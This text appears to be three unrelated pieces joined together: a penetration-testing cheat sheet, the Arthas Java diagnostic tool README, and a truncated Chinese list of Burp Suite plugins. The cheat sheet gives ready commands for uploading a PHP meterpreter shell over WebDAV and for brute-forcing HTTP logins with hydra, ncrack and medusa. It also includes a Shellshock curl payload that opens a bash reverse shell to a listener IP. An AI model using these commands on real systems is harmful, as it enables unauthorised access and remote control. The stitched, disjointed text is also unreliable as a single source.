HTTP/1.1 | The PUT method replaces all current representations of the target resource with the request payload. | | DELETE | DELETE /file.html HTTP/1.1 |DELETE request method deletes the specified resource. | | CONNECT | CONNECT www.example.com:443 HTTP/1.1 |CONNECT method starts two-way communications with the requested resource. It can be used to open a tunnel. | | OPTIONS | OPTIONS /index.html HTTP/1.1 |OPTIONS method requests permitted communication options for a given URL or server. A client can specify a URL with this method, or an asterisk (*) to refer to the entire server. | | TRACE | TRACE /index.html |TRACE method performs a message loop-back test along the path to the target resource, providing a useful debugging mechanism. | | PATCH | PATCH /file.txt HTTP/1.1 |PATCH request method applies partial modifications to a resource. | ## Detecting Available Methods # nmap -sT -sV -v -p 80,443 --script=http-methods.nse $IP # nmap -sT -sV -v -p 80,443 --script=http-method-tamper.nse $IP ## Upload File # nmap -p 80 --script http-methods --script-args http-methods.url-path='/index.php' $IP # nmap -p 80 --script http-methods --script-args http-method.test-all ='/192.168.1.100' 192.168.1.100 # nmap -p 80 192.168.1.100 --script http-put --script-args http-put.url='/dav/test.php',http-put.file='/dev/shm/test.php' ## Tools ## netcat # nc 192.168.1.100 80 HEAD /admin HTTP/1.1 # nc 192.168.1.100 80 TRACE / HTTP/1.1 # nc 192.168.1.100 80 OPTIONS http://192.168.1.100 / HTTP/1.0 ## curl # curl -X GET 192.168.1.100 # curl -X OPTIONS 192.168.1.100 # curl -X OPTIONS 192.168.1.100/webdev -v # curl -X POST 192.168.1.100 # curl -X PUT 192.168.1.100/uploads # curl -X DELETE 192.168.1.100 # curl 192.168.1.100/uploads --upload-file demo.txt # curl -I 192.168.1.100 ## nikto # nikto -h 192.168.1.100 ## davtest # davtest --help # davtest -url http://192.168.1.100/dav/ ## cadaver # cadaver --help # cadaver http://192.168.1.100/dav/ put /dev/shm/shell.php # msfconsole msf> use auxiliary/scanner/http/http_put msf>auxiliary (http_put) > set rhosts 192.168.1.100 msf>auxiliary (http_put) > set payload php/meterpreter/reverse_tcp msf>auxiliary (http_put) > set path /dav/ msf>auxiliary (http_put) > set filename meter.php msf>auxiliary (http_put) > set filedata file://root/Desktop/meter.php msf>auxiliary (http_put) > exploit ## HTTP Basic Authentication HTTP Basic Authentication implementation is the tehnique for enforce access control of the web server from unauthorised access, It doesn't required cookies. ## Tools ### hydra Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast. This tool gives researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system # hydra -l admin -P /usr/share/wordlists/rockyou.txt http-head://www.example.com/ # hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt http-head://www.example.com # hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/100k-most-used-passwords-NCSC.txt http-head://www.example.com # hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt http-get://www.example.com # hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/100k-most-used-passwords-NCSC.txt http-get://www.example.com # hydra -L user.txt -P pass.txt 192.168.1.100 http-get -L denotes the path of username List -P denotes the path of Password List -l represent the username -p represent the password ### ncrack Ncrack is an open source tool for network authentication cracking. It was designed for high-speed parallel cracking using a dynamic engine that can adapt to different network situations. Ncrack can also be extensively fine-tuned for special cases, though the default parameters are generic enough to cover almost every situation. It is built on a modular architecture that allows for easy extension to support additional protocols. Ncrack is designed for companies and security professionals to audit large networks for default or weak passwords in a rapid and reliable way. It can also be used to conduct fairly sophisticated and intensive brute force attacks against individual services. # ncrack -v -U user.txt -P pass.txt http://192.168.1.100 # ncrack -v --user user.txt --pass pass.txt http://192.168.1.100 # ncrack -v -user admin -P pass.txt http://192.168.1.100 # ncrack -v -user admin,administrator -p pass,password,pass@123 http://192.168.1.100 # ncrack -v -user admin,administrator -P pass.txt http://192.168.1.100 -v Verbosity -U Denotes the path of user list -P Denotes the path of password list -user Denotes the username with comma seprated -pass Denotes the password with comma seprated -T[0-5] set timing template ### Medusa Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items to some of the key features of this application: # medusa -h 192.168.1.100 -U user.txt -p p@$$w0rd -M http -f # medusa -h 192.168.1.100 -u admin -P pass.txt -M http -f # medusa -h 192.168.1.100 -U user.txt -P pass.txt -M http -f # medusa -h 192.168.1.100 -c combo.txt -M http -f [-c Combo files are colon separated and in the following format: host:user:password] -h host or url -U Denotes the path of user list -P Denotes the path of passowrd list -u Denotes the username with comma seprated -p Denotes the password with comma seprated -c Denotes the combo file colon seprated -M module name to be execute. ## Shellshock Vulnerability ## Identifying Shellshock Vulnerability ### curl # curl -v -H "user-agent: () { :; }; echo; /bin/bash -c 'echo 'Vulnerable\ to\ ShellShock''" http://example.com/cgi-dir/cgiscript ### nmap # nmap -v -sT -sV -p 80 --script http-shellshock.nse --script-args http-shellshock.uri='/cgi-dir/cgiscript' $IP ## Exploiting Shellshock Vulnerability ### curl Start listener for reverse shell # nc -nlvp 443 # curl -v -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.10/443 0>&1'" http://example.com/cgi-dir/script ### Shellshock Python Exploit [Exploit Link](https://www.exploit-db.com/exploits/34900) Edit Exploit - Mention Vulnerable Cgi-script Here ```bash pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"] ```
## Arthas ![arthas](site/src/site/sphinx/arthas.png) [![Build Status](https://travis-ci.org/alibaba/arthas.svg?branch=master)](https://travis-ci.org/alibaba/arthas) [![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas) ![maven](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg) ![license](https://img.shields.io/github/license/alibaba/arthas.svg) [![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Average time to resolve an issue") [![Percentage of issues still open](http://isitmaintained.com/badge/open/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Percentage of issues still open") `Arthas` is a Java Diagnostic tool open sourced by Alibaba. Arthas allows developers to troubleshoot production issues for Java applications without modifying code or restarting servers. [中文说明/Chinese Documentation](README_CN.md) ### Background Often times, the production system network is inaccessible from the local development environment. If issues are encountered in production systems, it is impossible to use IDEs to debug the application remotely. More importantly, debugging in production environment is unacceptable, as it will suspend all the threads, resulting in the suspension of business services. Developers could always try to reproduce the same issue on the test/staging environment. However, this is tricky as some issues cannot be be reproduced easily on a different environment, or even disappear once restarted. And if you're thinking of adding some logs to your code to help troubleshoot the issue, you will have to go through the following lifecycle; test, staging, and then to production. Time is money! This approach is inefficient! Besides, the issue may not be reproducible once the JVM is restarted, as described above. Arthas was built to solve these issues. A developer can troubleshoot your production issues on-the-fly. No JVM restart, no additional code changes. Arthas works as an observer, which will never suspend your existing threads. ### Key features * Check whether a class is loaded, or where the class is being loaded. (Useful for troubleshooting jar file conflicts) * Decompile a class to ensure the code is running as expected. * View classloader statistics, e.g. the number of classloaders, the number of classes loaded per classloader, the classloader hierarchy, possible classloader leaks, etc. * View the method invocation details, e.g. method parameter, return object, thrown exception, and etc. * Check the stack trace of specified method invocation. This is useful when a developers wants to know the caller of the said method. * Trace the method invocation to find slow sub-invocations. * Monitor method invocation statistics, e.g. qps, rt, success rate and etc. * Monitor system metrics, thread states and cpu usage, gc statistics, and etc. * Supports command line interactive mode, with auto-complete feature enabled. * Supports telnet and websocket, which enables both local and remote diagnostics with command line and browsers. * Supports JDK 6+. * Supports Linux/Mac/Windows. ### Online Tutorials(Recommend) * [Arthas Basics](https://alibaba.github.io/arthas/arthas-tutorials?language=en&id=arthas-basics) * [Arthas Advanced](https://alibaba.github.io/arthas/arthas-tutorials?language=en&id=arthas-advanced) ### Quick start #### Use `arthas-boot`(Recommend) Download`arthas-boot.jar`,Start with `java` command: ```bash wget https://alibaba.github.io/arthas/arthas-boot.jar java -jar arthas-boot.jar ``` Print usage: ```bash java -jar arthas-boot.jar -h ``` #### Use `as.sh` You can install Arthas with one single line command on Linux, Unix, and Mac. Copy the following command and paste it into the command line, then press *Enter* to run: ```bash curl -L https://alibaba.github.io/arthas/install.sh | sh ``` The command above will download the bootstrap script `as.sh` to the current directory. You can move it the any other place you want, or put its location in `$PATH`. You can enter its interactive interface by executing `as.sh`, or execute `as.sh -h` for more help information. ### Documentation * [Online Tutorials(Recommend)](https://alibaba.github.io/arthas/arthas-tutorials?language=en) * [User manual](https://alibaba.github.io/arthas/en) * [Installation](https://alibaba.github.io/arthas/en/install-detail.html) * [Quick start](https://alibaba.github.io/arthas/en/quick-start.html) * [Advanced usage](https://alibaba.github.io/arthas/en/advanced-use.html) * [Commands](https://alibaba.github.io/arthas/en/commands.html) * [Docker](https://alibaba.github.io/arthas/en/docker.html) * [User cases](https://github.com/alibaba/arthas/issues?q=label%3Auser-case) * [Questions and answers](https://github.com/alibaba/arthas/issues?utf8=%E2%9C%93&q=label%3Aquestion-answered+) * [How to contribute](https://github.com/alibaba/arthas/blob/master/CONTRIBUTING.md) * [Release Notes](https://alibaba.github.io/arthas/en/release-notes.html) ### Feature Showcase #### Dashboard * https://alibaba.github.io/arthas/en/dashboard ![dashboard](site/src/site/sphinx/_static/dashboard.png) #### Thread See what is eating your cpu (ranked by top cpu usage) and what is going on there in one glance: ```bash $ thread -n 3 "as-command-execute-daemon" Id=29 cpuUsage=75% RUNNABLE at sun.management.ThreadImpl.dumpThreads0(Native Method) at sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:440) at com.taobao.arthas.core.command.monitor200.ThreadCommand$1.action(ThreadCommand.java:58) at com.taobao.arthas.core.command.handler.AbstractCommandHandler.execute(AbstractCommandHandler.java:238) at com.taobao.arthas.core.command.handler.DefaultCommandHandler.handleCommand(DefaultCommandHandler.java:67) at com.taobao.arthas.core.server.ArthasServer$4.run(ArthasServer.java:276) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) Number of locked synchronizers = 1 - java.util.concurrent.ThreadPoolExecutor$Worker@6cd0b6f8 "as-session-expire-daemon" Id=25 cpuUsage=24% TIMED_WAITING at java.lang.Thread.sleep(Native Method) at com.taobao.arthas.core.server.DefaultSessionManager$2.run(DefaultSessionManager.java:85) "Reference Handler" Id=2 cpuUsage=0% WAITING on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Native Method) - waiting on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Object.java:503) at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:133) ``` #### jad Decompile your class with one shot: ```java $ jad javax.servlet.Servlet ClassLoader: +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 Location: /Users/xxx/work/test/lib/servlet-api.jar /* * Decompiled with CFR 0_122. */ package javax.servlet; import java.io.IOException; import javax.servlet.ServletConfig; import javax.servlet.ServletException; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; public interface Servlet { public void init(ServletConfig var1) throws ServletException; public ServletConfig getServletConfig(); public void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException; public String getServletInfo(); public void destroy(); } ``` #### mc Memory compiler, compiles `.java` files into `.class` files in memory. ```bash mc /tmp/Test.java ``` #### redefine Load the external `*.class` files to re-define the loaded classes in JVM. ```bash redefine /tmp/Test.class redefine -c 327a647b /tmp/Test.class /tmp/Test\$Inner.class ``` #### sc Search any loaded class with detailed information. ```bash $ sc -d org.springframework.web.context.support.XmlWebApplicationContext class-info org.springframework.web.context.support.XmlWebApplicationContext code-source /Users/xxx/work/test/WEB-INF/lib/spring-web-3.2.11.RELEASE.jar name org.springframework.web.context.support.XmlWebApplicationContext isInterface false isAnnotation false isEnum false isAnonymousClass false isArray false isLocalClass false isMemberClass false isPrimitive false isSynthetic false simple-name XmlWebApplicationContext modifier public annotation interfaces super-class +-org.springframework.web.context.support.AbstractRefreshableWebApplicationContext +-org.springframework.context.support.AbstractRefreshableConfigApplicationContext +-org.springframework.context.support.AbstractRefreshableApplicationContext +-org.springframework.context.support.AbstractApplicationContext +-org.springframework.core.io.DefaultResourceLoader +-java.lang.Object class-loader +-org.apache.catalina.loader.ParallelWebappClassLoader +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 classLoaderHash 25131501 ``` #### stack View the call stack of `test.arthas.TestStack#doGet`: ```bash $ stack test.arthas.TestStack doGet Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 286 ms. ts=2018-09-18 10:11:45;thread_name=http-bio-8080-exec-10;id=d9;is_daemon=true;priority=5;TCCL=org.apache.catalina.loader.ParallelWebappClassLoader@25131501 @test.arthas.TestStack.doGet() at javax.servlet.http.HttpServlet.service(HttpServlet.java:624) at javax.servlet.http.HttpServlet.service(HttpServlet.java:731) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110) ... at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1121) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:745) ``` #### Trace See what is slowing down your method invocation with trace command: ![trace](site/src/site/sphinx/_static/trace.png) #### Watch Watch the first parameter and thrown exception of `test.arthas.TestWatch#doGet` only if it throws exception. ```bash $ watch test.arthas.TestWatch doGet {params[0], throwExp} -e Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 65 ms. ts=2018-09-18 10:26:28;result=@ArrayList[ @RequestFacade[org.apache.catalina.connector.RequestFacade@79f922b2], @NullPointerException[java.lang.NullPointerException], ] ``` #### Monitor Monitor a specific method invocation statistics, including total number of invocations, average response time, success rate, and every 5 seconds: ```bash $ monitor -c 5 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 109 ms. timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:32 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.67 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:37 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 1.00 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:42 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.43 0.00% ``` #### Time Tunnel(tt) Record method invocation data, so that you can check the method invocation parameters, returned value, and thrown exceptions later. It works as if you could come back and replay the past method invocation via time tunnel. ```bash $ tt -t org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 75 ms. INDEX TIMESTAMP COST(ms) IS-RET IS-EXP OBJECT CLASS METHOD ------------------------------------------------------------------------------------------------------------------------------------- 1000 2018-09-20 09:54:10 1.971195 true false 0x55965cca DemoServiceImpl sayHello 1001 2018-09-20 09:54:11 0.215685 true false 0x55965cca DemoServiceImpl sayHello 1002 2018-09-20 09:54:12 0.236303 true false 0x55965cca DemoServiceImpl sayHello 1003 2018-09-20 09:54:13 0.159598 true false 0x55965cca DemoServiceImpl sayHello 1004 2018-09-20 09:54:14 0.201982 true false 0x55965cca DemoServiceImpl sayHello 1005 2018-09-20 09:54:15 0.214205 true false 0x55965cca DemoServiceImpl sayHello 1006 2018-09-20 09:54:16 0.241863 true false 0x55965cca DemoServiceImpl sayHello 1007 2018-09-20 09:54:17 0.305747 true false 0x55965cca DemoServiceImpl sayHello 1008 2018-09-20 09:54:18 0.18468 true false 0x55965cca DemoServiceImpl sayHello ``` #### Classloader ```bash $ classloader name numberOfInstances loadedCountTotal BootstrapClassLoader 1 3346 com.taobao.arthas.agent.ArthasClassloader 1 1262 java.net.URLClassLoader 2 1033 org.apache.catalina.loader.ParallelWebappClassLoader 1 628 sun.reflect.DelegatingClassLoader 166 166 sun.misc.Launcher$AppClassLoader 1 31 com.alibaba.fastjson.util.ASMClassLoader 6 15 sun.misc.Launcher$ExtClassLoader 1 7 org.jvnet.hk2.internal.DelegatingClassLoader 2 2 sun.reflect.misc.MethodUtil 1 1 ``` #### Web Console * https://alibaba.github.io/arthas/en/web-console ![web console](site/src/site/sphinx/_static/web-console-local.png) ### Known Users Welcome to register the company name in this issue: https://github.com/alibaba/arthas/issues/111 (in order of registration) ![Alibaba](static/alibaba.png) ![Alipay](static/alipay.png) ![Aliyun](static/aliyun.png) ![Taobao](static/taobao.png) ![Tmall](static/tmall.png) ![微医](static/weiyi.png) ![卓越教育](static/zhuoyuejiaoyu.png) ![狐狸金服](static/hulijingfu.png) ![三体云](static/santiyun.png) ![证大文化](static/zhengdawenhua.png) ![Acmedcare+](static/acmedcare.png) ![好慷](static/homeking365_log.png) ![来电科技](static/laidian.png) ![四格互联](static/sigehulian.png) ![ICBC](static/icbc.png) ![陆鹰](static/luying.png) ![玩友时代](static/wangyoushidai.png) ![她社区](static/tashequ.png) ![龙腾出行](static/longtengchuxing.png) ![foscam](static/foscam.png) ![二维火](static/2dfire.png) ![lanxum](static/lanxum_com.png) ![纳里健康](static/ngarihealth.png) ![掌门1对1](static/zhangmen.png) ![offcn](static/offcn.png) ![sia](static/sia.png) ![振安资产](static/zhenganzichang.png) ![菠萝](static/bolo.png) ![中通快递](static/zto.png) ![光点科技](static/guangdian.png) ![广州工程技术职业学院](static/gzvtc.jpg) ![mstar](static/mstar.png) ![xwbank](static/xwbank.png) ![imexue](static/imexue.png) ![keking](static/keking.png) ![secoo](static/secoo.jpg) ![viax](static/viax.png) ![yanedu](static/yanedu.png) ![duia](static/duia.png) ![哈啰出行](static/hellobike.png) ![hollycrm](static/hollycrm.png) ![citycloud](static/citycloud.jpg) ![yidianzixun](static/yidianzixun.png) ![神州租车](static/zuche.png) ![天眼查](static/tianyancha.png) ![商脉云](static/anjianyun.png) ![三新文化](static/sanxinbook.png) ![雪球财经](static/xueqiu.png) ![百安居](static/bthome.png) ![安心保险](static/95303.png) ![杭州源诚科技](static/hzyc.png) ![91moxie](static/91moxie.png) ![智慧开源](static/wisdom.png) ![富佳科技](static/fujias.png) ![鼎尖软件](static/dingjiansoft.png) ![广通软件](static/broada.png) ![九鼎瑞信](static/evercreative.jpg) ![小米有品](static/xiaomiyoupin.png) ![欧冶云商](static/ouyeel.png) ### Credit #### Contributors This project exists thanks to all the people who contribute. <a href="https://github.com/alibaba/arthas/graphs/contributors"><img src="https://opencollective.com/arthas/contributors.svg?width=890&button=false" /></a> #### Projects * [greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy): The Arthas code base has derived from Greys, we thank for the excellent work done by Greys. * [termd](https://github.com/termd/termd): Arthas's terminal implementation is based on termd, an open source library for writing terminal applications in Java. * [crash](https://github.com/crashub/crash): Arthas's text based user interface rendering is based on codes extracted from [here](https://github.com/crashub/crash/tree/1.3.2/shell) * [cli](https://github.com/eclipse-vertx/vert.x/tree/master/src/main/java/io/vertx/core/cli): Arthas's command line interface implementation is based on cli, open sourced by vert.x * [compiler](https://github.com/skalogs/SkaETL/tree/master/compiler) Arthas's memory compiler. * [Apache Commons Net](https://commons.apache.org/proper/commons-net/) Arthas's telnet client.
# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos) # BurpSuite - 400+ 开源Burp插件,400+文章和视频。 - [English Version](https://github.com/alphaSeclab/awesome-burp-suite/blob/master/Readme_en.md) # 目录 - [资源收集](#6366edc293f25b57bf688570b11d6584) -> [(7)工具](#6d0f7103a93a06f0ecb1f977d84b5de6) [(2)文章](#2c3209aabed9ff13fda9d88a4936c4c6) - [Burp组件](#ae80582b8823a66f4a44521a83cad5a5) - [Collaborator](#e0b6358d9096e96238b76258482a1c2f) -> [(10)工具](#93941e987724e5628e5c99b464df1593) [(17)文章](#68fb724c7d9a5b64518906674ffd0fc3) - [Intruder](#4a321e09485950304240c396765b7cff) -> [(1)工具](#2f3325a08e2a906e0cd9734ad154bc2c) [(15)文章](#5d252b1d5093aa46bc0845828af876f7) - [Repeater](#a91229e43b5d5e89525d9e5909476e5a) -> [(4)工具](#3ac2c10e6a07ba3171382daa407cf0ea) [(3)文章](#131243147e5e83b271d72709d89679cc) - [Extender](#44e70582b362d67cda62d99d75821115) -> [(11)工具](#2dfc04dd9ab94aa56da4b59a6d0f9c18) [(5)文章](#dcacf6d1c4c640ba97bcfaf4c441b955) - [Macros](#43101e4c97bc49a534738ecaa2baef98) -> [(1)工具](#4ac6fc3656c94a9161254fb0868dcd24) [(10)文章](#1c4a92df43bd77a97cf32192f9051327) - [(3) Extractor](#48f72e10306e4937d337396dfbb8a679) - [(5) Spider](#b3e0f002e0d2698844290a8789902b36) - [平台](#0f39062727a4aad884ef3a2cc6bde85a) - [Web](#d0ee432e093709d25c54688996cb632e) - [WAF](#52627ff036c7677483b148cdc96cc3a7) -> [(3)工具](#2db1854f35a2fd18838bd74f007cda5d) [(3)文章](#948e5b6f1e2a36af39c5f3224b10212a) - [HTTP/HTTPS](#f0728b8e21e86f04c33b8ff8f12ca55f) -> [(21)工具](#7144666e1152e4ddc6034d0643022595) [(24)文章](#f45de03725b766161db27df865129456) - [XSS](#7a78bdcffe72cd39b193d93aaec80289) -> [(11)工具](#73a4242179040ad255b6c99f75b0206d) [(9)文章](#108e9a125964cea14b452143bbc4558d) - [CSRF](#237219a0d75a05c588409fa422c8ad6f) -> [(1)工具](#3489e71087fdb27f9f13c0f2c9de2f76) [(13)文章](#aa292bb447f0a2e65fcef7dec5ac15e5) - [REST](#12918a4607ec282e4299d1eae31af190) -> [(5)工具](#a28290dd688dc4f5154419e5f9a065a1) [(4)文章](#181b3a7182770c6497d5d13b6ee07ba0) - [JWT](#cb76ddb14f3e8ec2348e70f5c69c8e2c) -> [(3)工具](#78b23f21484c457bb6e1db08f670a48e) [(1)文章](#c6b7af1690555f058a172581c6e52b5c) - [Windows](#91be958abe3c758e22bf7bf29227541b) -> [(3)文章](#95cc703af8e447cd065e71053f064ac2) - [Linux](#eb7c3e91b47aa256099b0852c9afbde6) -> [(1)文章](#9c64f16ea0f54acd36e29cc7386b5d8f) - [Apple](#d0e1003a674df5e0637b28aff2f7d675) -> [(4)文章](#515f7520ec815ac5d2117a6bc3cc7151) - [Android](#33431f1a7baa0f6193334ef4d74ff82c) -> [(2)工具](#d155578c9e4dea24eae19774031650dd) [(10)文章](#b49c9aa9af355ca85cec2125fe9da5ec) - [Cloud](#522d64730a37c1a8d0168f10f8d47bda) -> [(3)工具](#285c52a4e04dd2f86646c8e1235c9332) - [漏洞](#90339d9a130e105e1617bff2c2ca9721) -> [(24)工具](#b6b5b261338c5d44d981bc9f239219f2) [(19)文章](#9911c92a9ef03bfabe247b62b5340d8c) - [扫描](#663be1fd064aa42654f48bae1e1e1503) -> [(40)工具](#3d61290c2dab36e7b8e2a1538c60df6b) [(16)文章](#cf39c6ab3dcf02fdcf86dc43c77be5d6) - [Fuzz](#e9a969fc073afb5add0b75607e43def0) -> [(11)工具](#3cb057fb3f3cdaca2fc0ac0c8e87be2c) [(10)文章](#92225012d124990c0f3e4c317c9603d4) - [SQL](#0481f52a7f7ee969fa5834227e49412e) -> [(10)工具](#b90695c04ef9e0a788a2aa07dec6f2b5) [(33)文章](#3aad4ab885a1f2eb2a9feab0506a5d6c) - [日志](#19f0f074fc013e6060e96568076b7c9a) -> [(9)工具](#9522b6866834eb0ce3563b27921745a4) - [Payload](#fc5f535e219ba9694bb72df4c11b32bd) -> [(14)工具](#aa76bde443edd8ef5b7af7e0fcab354e) [(5)文章](#82355d06762a967f22a906864b7e1a39) - [开发与调试](#b4b2acd195a5a5fb6c44ca011fcd3c71) -> [(2)工具](#846faac18fb6ee281aac739c032454ea) [(18)文章](#f74e4fb5d2e05b88f1f1b59a7ecf4094) - [爆破](#98d0bee1e766dc5d225fefc3fa6dc3db) -> [(4)工具](#5cf783bf4e7456b09cb04c4ffe65492c) [(5)文章](#f455d68fb029359c7b018c50af299bed) - [验证码](#d1ddcb393c7ba81ecc74f18bbad711e1) -> [(1)工具](#f0622d00c931cf67b524a13972f5bcdc) [(2)文章](#b385afb89d80f203553bf8e0ef26d997) - [编码/解码](#3cc7b91da90b8f1a33d2ea14511332ef) -> [(10)工具](#ed0af60dcbdf5f3efab33d1cc4c1e4ea) [(2)文章](#cc4e4bfbe3ffd7c40e714532bf19f7d5) - [认证/登录](#e73752a0766067683f58fba20e2a3940) -> [(6)工具](#4230c7dcb571d29a706e9b753d5644e6) [(10)文章](#eb559564a0c8ca1a92679f16198fdb52) - [Brida](#9dd6a1c90cad20f451e9ba643c6e1b4b) -> [(1)工具](#1b569f5d261711d2ed5426e9c91d1326) [(8)文章](#885ed46edb670875c073a1bd89684da8) - [代理](#f68c8a913de4484c516af41948da1776) -> [(18)工具](#0f1ed20665c333e6230506e95b893575) [(22)文章](#5118294d10a7809bd295221e6c078804) - [域/子域](#b431101397ce332c0afabdc990dac191) -> [(4)工具](#08b61ea39352bc958f978412f7d361c5) [(1)文章](#983c455cb35f2960af743452b8495414) - [工具](#39e9a0fe929fffe5721f7d7bb2dae547) - [(172) 新添加](#5b761419863bc686be12c76451f49532) - [(3) 文档](#937f31acfb275a8ed8ab47cf9d5817b7) - [文章](#dab83e734c8176aae854176552bff628) - [(159) 新添加](#b5b59b6b602121e87742e7467cf6e377) # <a id="6366edc293f25b57bf688570b11d6584"></a>资源收集 *** ## <a id="6d0f7103a93a06f0ecb1f977d84b5de6"></a>工具 - [**1197**星][1m] [snoopysecurity/awesome-burp-extensions](https://github.com/snoopysecurity/awesome-burp-extensions) Burp扩展收集 - [**1167**星][9d] [Py] [bugcrowd/hunt](https://github.com/bugcrowd/HUNT) Burp和ZAP的扩展收集 - [**108**星][2m] [Java] [jgillam/burp-co2](https://github.com/jgillam/burp-co2) A collection of enhancements for Portswigger's popular Burp Suite web penetration testing tool. - [**87**星][11m] [Py] [laconicwolf/burp-extensions](https://github.com/laconicwolf/burp-extensions) A collection of scripts to extend Burp Suite - [**67**星][12d] [Py] [lich4/personal_script](https://github.com/lich4/personal_script) 010Editor/BurpSuite/Frida/IDA等多个工具的多个脚本 - [010Editor](https://github.com/lich4/personal_script/tree/master/010Editor_Script) 010Editor的多个脚本 - [ParamChecker](https://github.com/lich4/personal_script/tree/master/BurpSuite_Script) Burp插件 - [Frida](https://github.com/lich4/personal_script/tree/master/Frida_script) Frida多个脚本 - [IDA](https://github.com/lich4/personal_script/tree/master/IDA_Script) IDA Scripts - [IDA-read_unicode.py](https://github.com/lich4/personal_script/blob/master/IDA_Script/read_unicode.py) IDA插件,识别程序中的中文字符 - [IDA-add_xref_for_macho](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_xref_for_macho.py) 辅助识别Objective-C成员函数的caller和callee - [IDA-add_info_for_androidgdb](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_info_for_androidgdb.py) 使用gdbserver和IDA调试Android时,读取module列表和segment - [IDA-trace_instruction](https://github.com/lich4/personal_script/blob/master/IDA_Script/trace_instruction.py) 追踪指令流 - [IDA-detect_ollvm](https://github.com/lich4/personal_script/blob/master/IDA_Script/detect_ollvm.py) 检测OLLVM,在某些情况下修复(Android/iOS) - [IDA-add_block_for_macho](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_block_for_macho.py) 分析macho文件中的block结构 - [**23**星][4y] [Java] [ernw/burpsuite-extensions](https://github.com/ernw/burpsuite-extensions) A collection of Burp Suite extensions - [**16**星][9d] [Batchfile] [mr-xn/burpsuite-collections](https://github.com/mr-xn/burpsuite-collections) BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程 *** ## <a id="2c3209aabed9ff13fda9d88a4936c4c6"></a>文章 - 2019.10 [trustfoundry] [The Top 8 Burp Suite Extensions That 